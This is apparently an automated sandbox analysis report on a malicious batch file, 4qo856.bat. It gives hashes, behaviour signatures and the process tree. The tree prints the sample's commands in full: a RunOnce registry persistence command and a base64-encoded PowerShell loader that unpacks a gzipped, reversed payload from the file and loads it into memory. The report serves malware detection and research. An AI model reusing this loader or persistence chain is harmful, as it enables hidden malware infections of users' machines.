Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
02-02-2023 07:25
Static task
static1
Behavioral task
behavioral1
Sample
4qo856.bat
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
4qo856.bat
Resource
win10v2004-20221111-en
General
-
Target
4qo856.bat
-
Size
2.1MB
-
MD5
e8939f95a675b9fb924eebe38827c456
-
SHA1
fc8b276222231d8184c21c69b655903b84a59430
-
SHA256
75ce85c7868efffdd665bf1234b0e2cfc31a5bd24a493cfb6e237e7de32cb73e
-
SHA512
f149ca122eddf7e8f611427ebd146608096884ee3b9e4b97c77d2771f6119afb13f357a3d5192e099a6168606c3d3c151eefe36779f8c82640b8a2b2a75c5e08
-
SSDEEP
24576:NnNaBvX2dfBil92AzBE4y1/feTDVzt6iZ+9/5KbCSfpItxCxe0U1k2jPaez/+L6a:KGwl2vuuiY50Tk91HLiA5dLkll1n
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
4qo856.bat.exe4qo856.bat.exepid process 3348 4qo856.bat.exe 2584 4qo856.bat.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4qo856.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation 4qo856.bat.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
reg.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4qo856 = "C:\\Users\\Admin\\AppData\\Roaming\\4qo856.bat" reg.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
4qo856.bat.exedescription pid process target process PID 3348 set thread context of 2584 3348 4qo856.bat.exe 4qo856.bat.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\45c740c9-056c-47e9-b6b9-381775e541c1.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230202082738.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
4qo856.bat.exepowershell.exemsedge.exemsedge.exeidentity_helper.exepid process 3348 4qo856.bat.exe 3348 4qo856.bat.exe 1264 powershell.exe 1264 powershell.exe 4388 msedge.exe 4388 msedge.exe 2196 msedge.exe 2196 msedge.exe 4744 identity_helper.exe 4744 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 2196 msedge.exe 2196 msedge.exe 2196 msedge.exe 2196 msedge.exe 2196 msedge.exe 2196 msedge.exe 2196 msedge.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
4qo856.bat.exepowershell.exedescription pid process Token: SeDebugPrivilege 3348 4qo856.bat.exe Token: SeDebugPrivilege 1264 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msedge.exepid process 2196 msedge.exe 2196 msedge.exe 2196 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exe4qo856.bat.exe4qo856.bat.exemsedge.exedescription pid process target process PID 4072 wrote to memory of 4884 4072 cmd.exe reg.exe PID 4072 wrote to memory of 4884 4072 cmd.exe reg.exe PID 4072 wrote to memory of 2132 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 2132 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 3348 4072 cmd.exe 4qo856.bat.exe PID 4072 wrote to memory of 3348 4072 cmd.exe 4qo856.bat.exe PID 4072 wrote to memory of 3348 4072 cmd.exe 4qo856.bat.exe PID 3348 wrote to memory of 1264 3348 4qo856.bat.exe powershell.exe PID 3348 wrote to memory of 1264 3348 4qo856.bat.exe powershell.exe PID 3348 wrote to memory of 1264 3348 4qo856.bat.exe powershell.exe PID 3348 wrote to memory of 2584 3348 4qo856.bat.exe 4qo856.bat.exe PID 3348 wrote to memory of 2584 3348 4qo856.bat.exe 4qo856.bat.exe PID 3348 wrote to memory of 2584 3348 4qo856.bat.exe 4qo856.bat.exe PID 3348 wrote to memory of 2584 3348 4qo856.bat.exe 4qo856.bat.exe PID 3348 wrote to memory of 2584 3348 4qo856.bat.exe 4qo856.bat.exe PID 3348 wrote to memory of 2584 3348 4qo856.bat.exe 4qo856.bat.exe PID 3348 wrote to memory of 2584 3348 4qo856.bat.exe 4qo856.bat.exe PID 3348 wrote to memory of 2584 3348 4qo856.bat.exe 4qo856.bat.exe PID 4072 wrote to memory of 364 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 364 4072 cmd.exe attrib.exe PID 2584 wrote to memory of 2196 2584 4qo856.bat.exe msedge.exe PID 2584 wrote to memory of 2196 2584 4qo856.bat.exe msedge.exe PID 2196 wrote to memory of 4344 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4344 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe PID 2196 wrote to memory of 4552 2196 msedge.exe msedge.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 2132 attrib.exe 364 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4qo856.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v 4qo856 /d "C:\Users\Admin\AppData\Roaming\4qo856.bat"2⤵
- Adds Run key to start application
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe2⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exeC:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAL8AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwC/ACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBQAHIAbwBnAHIAYQBtACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exeC:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=4qo856.bat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.04⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc5f8546f8,0x7ffc5f854708,0x7ffc5f8547185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5364 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7b4705460,0x7ff7b4705470,0x7ff7b47054806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1272 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3148 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2112,14410334692175850195,13592436361104981246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1044 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=4qo856.bat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.04⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc5f8546f8,0x7ffc5f854708,0x7ffc5f8547185⤵
-
C:\Windows\system32\attrib.exeattrib -h C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exe2⤵
- Views/modifies file attributes
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c71cb7463c49e125cbae14ac265cf18f
SHA14430c030546d725e7f6e5584f139e012e9214f06
SHA2561eb6d93849a5c52e9b381fc0abd82b401e2d1e5dfbedd48a3cff50e91e758018
SHA5122f1317d23dfe8c39760e51900cfaed49a2ba4675f0904ec033252e037e0eb935e59b4cc0b8c11c4acd7cfbddf0d9d461f5a66504494863c2bb7781aa3c000eed
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD56d0a0cc1e31391e7f706a861ec4617ba
SHA116a38c6c4cfcb9b6422144b44ec5d02ff39ba7b9
SHA256252bea5ee31481b8d267b5d5a27e42528a661ae85434d5f948b182ff1109429d
SHA512b5d4668fb3203d997a97eb5c2be2b04d30540896d6ca1d71270d86108c383b537ff79e4114e66807e88a714b3b2cfa32113a1405d055f74e0d0dd03f57551b2a
-
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Local\Temp\4qo856.bat.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
\??\pipe\LOCAL\crashpad_2196_DTAUWUCEGDJEKXKDMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/364-155-0x0000000000000000-mapping.dmp
-
memory/576-180-0x0000000000000000-mapping.dmp
-
